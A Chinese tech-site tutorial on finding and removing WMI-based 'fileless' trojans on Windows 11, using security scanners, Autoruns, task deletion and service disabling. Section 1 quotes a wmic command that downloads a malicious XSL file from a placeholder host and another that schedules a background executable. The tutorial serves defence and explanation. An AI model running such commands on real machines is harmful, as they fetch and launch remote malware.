Win11系统如何完美查杀WMI木马 WMI木马防范教程
Win11系统WMI木马查杀教程!WMI(即Windows Management Instrumentation的简称)是Windows的一个核心组件。我们可以借助该组件实现脚本部署、进程枚举、监控目录修改等常见的操作,一些不怀好意的开发者则利用WMI的这些特性生成木马来危害我们的电脑。由于WMI是系统组件,这样WMI木马可以实现“无文件”方式运行,难以被分析及检测到。那么如果电脑被WMI木马入侵会有什么表现,我们又该怎样对其进行查杀和防范呢?
1. 了解WMI恶意软件的运行机制
如上所述,WMI具备的功能非常丰富,对于黑客来说只要利用其中的命令就可以完成很多操作。比如获得相应的权限后,在目标电脑上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以实现从网站服务器上下载所需的恶意软件123.xsl(图1)。
当然在实际运行中,这些恶意软件还可以利用WMI进行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令创建一个在后台运行的任务计划,甚至可以执行创建系统服务、将DLL文件注入系统进程等操作。因为这里使用的都是系统命令(wmic.exe),并不像常规的木马、病毒那样由本体执行,所以称之为“无文件”(严格来说是WMI脚本运行,脚本被触发后执行下载木马等操作)方式运行。比如臭名昭著的“KingMiner挖矿木马”,它通过WMI事件订阅来不断地触发木马在后台运行。
●火速链接:
本刊2018年6期文章《解决WMI进程资源占用的问题》介绍了WMI的相关知识。
2. 发现和识别WMI恶意软件
WMI木马的一个重要特性就是借助WMI脚本来下载或者激活木马运行。比如某WMI挖矿木马感染电脑后会在系统里生成一个任务计划,任务会在后台连接到服务器下载挖矿木马。挖矿木马运行后会占用系统大量的资源和带宽,导致Windows在日常使用时运行缓慢,网页打开速度也变得很慢,且电脑的硬盘指示灯一直在闪烁(因为木马会在后台不断地读取数据)。如果自己的电脑在使用时有上述的异常现象,那么就需要使用安全软件检查是否中了木马。
Windows 10用户可以先使用系统自带的“安全中心”进行查杀,如果无法解决问题则可以借助一些木马专杀软件,如火绒恶性木马专杀工具(https://bbs.huorong.cn/thread-18575-1-1.html)进行查杀,启动软件后点击“立即扫描”,常见的木马(包括WMI木马)一般都可以被自动查杀(图2)。
不过,如果中了WMI木马,安全软件只会将WMI脚本下载的木马文件删除,但是无法完全斩断WMI木马文件的下载途径,如上述介绍的WMI挖矿木马就是利用任务计划进行下载。因为任务计划中并没有恶意软件,安全软件是不会将其删除的,所以通过专杀软件删除木马后,每次重启系统扫描后还是一直提示发现木马文件,那么就极可能中了WMI木马,这时就还需要对系统的启动项进行检查,查看是否有异常的启动项。
系统启动项检查可以借助Autoruns来完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),启动程序后它会自动对本机所有的启动项目进行检测,包括计划任务、服务、WMI等(图3)。
比如笔者公司的一台电脑在执行安全扫描时就发现木马文件无法彻底删除的现象,在本机运行Autoruns后切换到“计划任务”,在打开的窗口中就可以看到后台所有的任务计划。对于没有数字签名的任务,程序会使用浅红色进行标注,可以看到本机中一个名为“lsmosee”的任务极为可疑,它加载的是本机临时目录中的一个VBS文件(图4)。
在上图选中“lsmosee”并右击,选择“跳转到文件夹”,在打开的文件夹中根据图上“镜像路径”的提示,使用记事本打开“54236.vbs”文件,其中显示的正是一些WMI脚本的内容,它的作用就是在后台定时下载木马文件。现在按提示将其删除。接着返回上图,选中“lsmosee”任务并点击“删除”,这样就可以切断木马的下载通道。最后使用火绒安全软件再扫描一遍电脑,删除其他带毒的文件后,问题得到顺利的解决(图5)。
3. 一劳永逸封禁WMI木马下载
WMI木马难以查杀的原因就是由于它的下载方式是通过WMI脚本实现,而且WMI脚本激活的方法很多(如上例为任务计划,有些则是使用进程注入等),不过WMI脚本的运行要依赖“WMI Performance Adapter”服务,因此对于个人用户来说,可以通过停用服务的方法来禁止WMI脚本的运行。在桌面的任务栏搜索框中输入“服务”,打开服务管理组件后找到上述服务,双击打开后将其停止,并将其启动类型设置为“禁用”,这样本机所有的WMI脚本就无法运行了(图6)。
注意:
禁用WMI服务可能会导致一些网络服务无法使用。禁用服务如果影响电脑使用,请及时进行恢复。
以上就是脚本之家小编给大家分享的Win11系统WMI木马查杀教程了, 希望大家喜欢!
相关文章
Win11 安卓子系统 2305今日更新: 邀请测试文件共享功能
微软在 Win11 系统上测试 Windows Subsystem for Android 更新,最新版本号为 2305.40000.4.0,下面我们就来看看WSA 2305.40000.4.0 新内容汇总2023-06-13win11禁用全屏优化在哪里? Win11游戏禁用全屏优化的设置技巧
win11禁用全屏优化在哪里?win11系统玩游戏的时候不想要进行全屏优化,该怎么操作呢?下面我们就来看看Win11游戏禁用全屏优化的设置技巧2023-06-13Win11下载的微信不在桌面如何解决?Win11下载的微信不在桌面解决方法
有很多小伙伴还不知道Win11下载的微信不在桌面上如何解决,本文就为大家带来了详细的解决方法,需要的朋友一起看看吧2023-06-13升级Win11一直卡在加载中怎么办?升级Win11一直卡在加载中解决方法
用户点击升级Win11系统,但是Win11系统却一直卡在加载中,这让用户非常苦恼,本文就为大家带来了详细的解决方法,需要的朋友一起看看吧2023-06-13Win11管理员运行cmd位置在哪?Win11管理员运行cmd位置介绍
相信很多用户在使用过程中,会遇到win11管理员运行cmd位置在哪?其实这个问题很简单,下文就为大家带来了详细的解决方法,需要的朋友一起看看吧2023-06-13- 很多人都会使用激活密钥来激活,但是却不知道如何去查看这些密钥,今天小编就为大家带来了详细的Win11查看密钥的方法,需要的朋友一起看看吧2023-06-13
Win11怎么增加系统暂停更新时间至521周? win11延迟系统更新时间教程
Win11怎么增加系统暂停更新时间至521周?win11更新频繁,选择延迟更新最多是5周,想要改成521周,该怎么操作呢?下面我们就来看看win11延迟系统更新时间教程2023-06-12Win11 Canary Build 25387.1200预览版今日发布: 主要用于测试服务管道
微软表示面向 Canary 频道用户再次发布更新,用户安装后版本号升至 Build 25387.1200。微软在推文中明确表示本次更新并不包含任何新内容,主要用于测试服务管道2023-06-10Win11 KB5027305发布:Beta版本升至 22621.1835/22631.1835
微软发布了适用于 Win11 的 KB5027305 更新,用户安装后版本号升至 Build 22621.1835 和 22631.1835,这个版本新增了哪些工呢?详细请看下文介绍2023-06-09Win11资源管理器怎么关闭导航窗格? 资源管理器中不显示导航的技巧
Win11资源管理器怎么关闭导航窗格?win11系统中的资源管理器显示左侧导航,该怎么关闭呢?下面我们就来看看win11资源管理器中不显示导航的技巧2023-06-09
最新评论